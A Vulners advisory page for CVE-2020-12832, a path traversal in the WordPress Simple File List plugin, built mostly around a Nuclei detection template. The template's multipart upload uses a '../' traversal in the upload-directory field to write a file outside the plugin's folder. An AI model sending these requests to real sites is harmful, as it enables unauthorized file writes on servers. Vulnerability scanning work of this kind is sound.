Lucene search
K

WordPress Simple File List - Path Traversal

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

WordPress Simple File List path traversal writes outside the upload directory; update to version 4.2.8 or later.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-12832
22 Dec 202400:00
circl
CNVD
WordPress simple-file-list plugin path traversal vulnerability
14 May 202000:00
cnvd
CVE
CVE-2020-12832
13 May 202017:52
cve
Cvelist
CVE-2020-12832
13 May 202017:52
cvelist
EUVD
EUVD-2020-5114
7 Oct 202500:30
euvd
NVD
CVE-2020-12832
13 May 202018:15
nvd
OSV
CVE-2020-12832
13 May 202018:15
osv
Patchstack
WordPress Simple File List plugin <= 4.2.7 - Authenticated Arbitrary File Deletion vulnerability
16 May 202000:00
patchstack
Prion
Input validation
13 May 202018:15
prion
Positive Technologies
PT-2020-13280
13 May 202000:00
ptsecurity
Rows per page
id: CVE-2020-12832

info:
  name: WordPress Simple File List - Path Traversal
  author: riteshs4hu
  severity: critical
  description: |
    Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
  impact: |
    Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.
  remediation: |
    Update to version 4.2.8 or later.
  reference:
    - https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/
    - http://nvd.nist.gov/vuln/detail/CVE-2020-12832
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12832
    epss-score: 0.07131
    epss-percentile: 0.93491
    cwe-id: CWE-22
    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: Simple File List
    product: Simple File List WordPress Plugin
  tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev

variables:
  rand: "{{rand_base(7)}}"

http:
  - raw:
      - |
        GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: slug
        json:
          - '.[] | select(.content.rendered | contains("eeSFL_UploadGo")) | .slug'
        internal: true

  - raw:
      - |
        GET {{slug}}/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: sflnonce
        group: 1
        regex:
          - 'name="ee-simple-file-list-upload-nonce"[^>]*?value="([A-Za-z0-9]+)"'
        internal: true

      - type: regex
        name: sflid
        group: 1
        regex:
          - 'id="eeSFL_ID">([0-9]+)'
        internal: true

      - type: regex
        name: ext
        group: 1
        regex:
          - 'eeSFL_FileFormats\s*=\s*"([A-Za-z0-9]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ

        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ
        Content-Disposition: form-data; name="action"

        sfl_upload_job
        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ
        Content-Disposition: form-data; name="file"; filename="{{rand}}.{{ext}}"
        Content-Type: application/octet-stream

        {{rand}}
        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ
        Content-Disposition: form-data; name="eeSFL_ID"

        {{sflid}}
        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ
        Content-Disposition: form-data; name="eeSFL_FileUploadDir"

        wp-content%2Fuploads%2Fsimple-file-list%2F..%2F
        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ
        Content-Disposition: form-data; name="ee-simple-file-list-upload"

        {{sflnonce}}
        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ--

  - raw:
      - |
        GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "{{rand}}")'
        condition: and
# digest: 4a0a00473045022046611f46d869d9ab13196943eefc391a0d1d249dea0b0acb4201917d7f6e3aee022100fabd9ad85b775a86b3b122eb64eb272a147e28464965330149825c6ea9b2fe85:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 27.5
CVSS 3.19.8
EPSS0.07131
21